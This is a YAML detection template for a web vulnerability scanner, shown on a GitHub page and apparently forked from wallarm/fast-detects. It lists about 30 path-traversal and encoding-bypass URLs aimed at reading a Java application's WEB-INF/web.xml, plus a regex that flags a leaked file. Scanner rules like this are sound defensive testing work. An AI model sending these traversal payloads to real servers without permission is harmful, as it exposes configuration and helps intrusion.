forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
java-web-inf-uri.yaml
114 lines (82 loc) · 2.39 KB
/
java-web-inf-uri.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
# you have to add URI_.* insertion point to your policy
send:
- method: 'GET'
url: "/WEB-INF/web.xml"
- method: 'GET'
url: "/web-inf/web.xml"
- method: 'GET'
url: "/WEB-INF./web.xml"
- method: 'GET'
url: "/../WEB-INF/web.xml"
- method: 'GET'
url: "/../../WEB-INF/web.xml"
- method: 'GET'
url: "/../../../WEB-INF/web.xml"
- method: 'GET'
url: "/../../../../WEB-INF/web.xml"
- method: 'GET'
url: "/demo/../WEB-INF/web.xml"
- method: 'GET'
url: "/wiki/struts/..%252f..%252f/WEB-INF/web.xml"
- method: 'GET'
url: "/wiki/struts/..%252f..%252f..%252f/WEB-INF/web.xml"
- method: 'GET'
url: "/..;/WEB-INF/web.xml"
- method: 'GET'
url: "/..;/..;/WEB-INF/web.xml"
- method: 'GET'
url: "/..%3B/WEB-INF/web.xml"
- method: 'GET'
url: "/..%253B/WEB-INF/web.xml"
- method: 'GET'
url: "/plugins//../WEB-INF/web.xml%C0%80.jsp"
- method: 'GET'
url: "/js/app//../WEB-INF/web.xml%C0%80.jsp"
- method: 'GET'
url: "/js/app//../WEB-INF/web.xml"
- method: 'GET'
url: "/js/app//../../WEB-INF/web.xml"
- method: 'GET'
url: "/ctxroot/%C0%AE/WEB-INF/web.xml"
- method: 'GET'
url: "/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml"
- method: 'GET'
url: "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/WEB-INF/web.xml"
- method: 'GET'
url: "/js/app/../../WEB-INF/web.xml%3bx%3d/"
- method: 'GET'
url: "/js/app/1//../../WEB-INF/web.xml%C0%80.jsp"
- method: 'GET'
url: "/%c0%ae/WEB-INF/web.xml"
- method: 'GET'
url: "/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
- method: 'GET'
url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
- method: 'GET'
url: "/%25c0%25ae/%25c0%25ae/%25c0%25ae/%25c0%25ae/WEB-INF/web.xml"
- method: 'GET'
url: "/WEB-INF/web.xml;x="
- method: 'GET'
url: "/../WEB-INF/web.xml;x="
- method: 'GET'
url: "/../../WEB-INF/web.xml;x="
- method: 'GET'
url: "/../../../WEB-INF/web.xml;x="
detect:
- response:
- body: '<web-app[\w\W]+<\/web-app>'
meta-info:
- title: "Java web.xml information leakage vulnerability"
- description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information."
- type: info
- threat: 20
- applicable_for:
- fast
- scanner
- tags:
- Information Exposure
- Java
- web-inf
- tomcat
- JBoss
- J2EE